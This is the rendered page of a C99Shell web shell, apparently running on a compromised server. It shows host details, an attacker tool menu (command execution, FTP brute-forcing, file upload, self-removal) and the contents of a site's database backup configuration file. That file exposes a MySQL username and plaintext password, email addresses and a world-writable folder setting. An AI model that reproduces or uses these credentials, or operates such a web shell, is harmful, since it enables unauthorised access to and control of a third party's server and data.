!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/automatas/   drwxrwxrwx
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     configbackup.php (1.63 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**Developer: Anish Karim C*[[email protected]]*****                       *     *     *
***FileFor: MySQL Database BackUP[config.php]***********                        *   *   *
***CreatedOn: 19th November 2009*****************************                     * * *
***Details: configuration file. All data enters here************             * * *  C  * * *
***************************************************************              * * *
*************************************************************            *   *   *
***Suggestions and Comments are welcome******************              *     *     *
*/

//Back Up Folder*
$backUpFolder    "./sql_backup"// The folder which the sql file stored. It is needed
//mkdir($backUpFolder);    //Create Directory
chmod($backUpFolder,0777); // Make it writable. Incase it already there.

//Server Details*

$server['host']    = "localhost";    //The hostname
$server['port']    = "";    //Give the port number allocated for MySQL. Leave blank if it is default[3306]
$server['user']    = "papyr225_1";    //MySQLDatabase Username. Need to have all permission to the database.
$server['pass']    = "ilvm2rg2";    //MySQLDatabase Password.
$server['database']    = "papyr225_phpb1";    //MySQLDatabase Name.

//Mailing Details*
$mailer["FromMail"]    = "[email protected]"//From e-mail address. If you don't want to specify leave it blank
$mailer["ToMail"]    = "papyrefb2.gmail.com";    // Address which the mail should send. If no mailing is needed, Please leave it blank.
$mailer["MailBody"]    = "copia de segiridad";    //Body of the mail
$mailer["DAM"]    = false;    //Change it to true when the file in the server needs to remove after finish sending mail. Default is false.

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0033 ]--